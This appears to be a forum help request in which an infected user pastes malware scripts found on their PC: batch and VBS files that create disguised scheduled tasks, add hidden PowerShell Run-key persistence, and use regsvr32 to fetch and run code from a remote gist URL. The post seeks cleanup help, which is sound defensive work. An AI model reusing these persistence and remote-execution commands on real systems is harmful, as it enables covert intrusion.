How to reverse what a virus changed and stop it from opening in startup.

  • Thread starter Thread starter Zerlingg
  • Start date Start date
Z

Zerlingg

Guest
After getting stressed because a virus didnt stopped to open a cmd every time i closed it i started checking the files from the program that installed it (because no antivirus has fixed this :( ) and then found this things:


first thing that opens is a launcher.bat that gets open when tryng to run the program, and this is what it does:

cd .. && cd data && cd source && cd data1 && cd data2

xcopy /s /Y data3 C:\Users\Public\Music /E /H

cd data3 && cd bin

schtasks /create /tn "OneDrive32" /tr "cmd /c start /min C:\Users\Public\Music\bin\java.bat" /sc minute /mo 2 /F

schtasks /create /tn "WindowsPhotos" /tr "cmd /c start /min C:\Users\Public\Music\bin\ghost.exe" /sc minute /mo 33 /F

schtasks /create /tn "Defender" /tr "regsvr32.exe /s /i:shellcode,https://gist.githubusercontent.com/...w/618d8f693a83a52235fa4983baa95f94c6cbfd1d/cs C:\Users\Public\Music\bin\64.dll" /sc minute /mo 32 /F

wscript.exe service.vbs && wscript.exe java.vbs

start ghost.exe

attrib +h C:\Users\Public\Music

exit



It changes "Defender", "WindowsPhotos" and "OneDrive32". Also it starts running that "ghost.exe", and install other things like a code from github. I want to revert all of this so it stops the virus and cmds, and also, let me show you other files i found at C:\Users\Public\Music\bin\ directory that it hides (thankfully i found all of this because i always have the hidden files not hidden).


java.vbs runs:


const CONSOLE_HIDE=0

const CONSOLE_SHOW=1

const CMD_WAIT=true



set O = CreateObject("Wscript.Shell")

D="HKCU\jaava"

H="cmd /c start /min C:\Users\Public\Music\bin\java.bat"

O.regwrite D,H,"REG_SZ"

O.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\cleaner", U & "cmd.exe /c powershell -ExecutionPolicy Bypass -windowstyle hidden -Command " & chrw(34) & "$y = (get-itemproperty -path 'HKCU:\' -name 'jaava').jaava;cmd /c $y" & Chrw(34) , "REG_SZ"

O.Run "powershell -ExecutionPolicy Bypass -windowstyle hidden -Command " & chrw(34) & "$y = (get-itemproperty -path 'HKCU:\' -name 'jaava').jaava;cmd /c $y" & Chrw(34),0,false



I took a look at Java.bat too:


cd C:\Users\Public\Music\bin && start /min jjs.bat && exit


And jjs.bat:


echo eval(new java.lang.String(java.util.Base64.decoder.decode(' '))); | powershell.exe -WindowStyle Hidden C:\Users\Public\Music\bin\svchost.exe


(inside the (' ') goes a really long text of random leters and numbers, but i dont want to put it, i dont think it will help in anything)



I also checked Service.vbs:


const CONSOLE_HIDE=0

const CONSOLE_SHOW=1

const CMD_WAIT=true



set O = CreateObject("Wscript.Shell")

D="HKCU\alien34"

H="regsvr32.exe /s /i:shellcode,https://gist.githubusercontent.com/...w/618d8f693a83a52235fa4983baa95f94c6cbfd1d/cs C:\Users\Public\Music\bin\64.dll"

O.regwrite D,H,"REG_SZ"

O.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive32", U & "cmd.exe /c powershell -ExecutionPolicy Bypass -windowstyle hidden -Command " & chrw(34) & "$y = (get-itemproperty -path 'HKCU:\' -name 'alien34').alien34;cmd /c $y" & Chrw(34) , "REG_SZ"

O.Run "powershell -ExecutionPolicy Bypass -windowstyle hidden -Command " & chrw(34) & "$y = (get-itemproperty -path 'HKCU:\' -name 'alien34').alien34;cmd /c $y" & Chrw(34),0,false



If you need anything else to check just tell me, i will post in a comment if i find more things

Continue reading...
 
You must log in or register to reply here.
Back
Top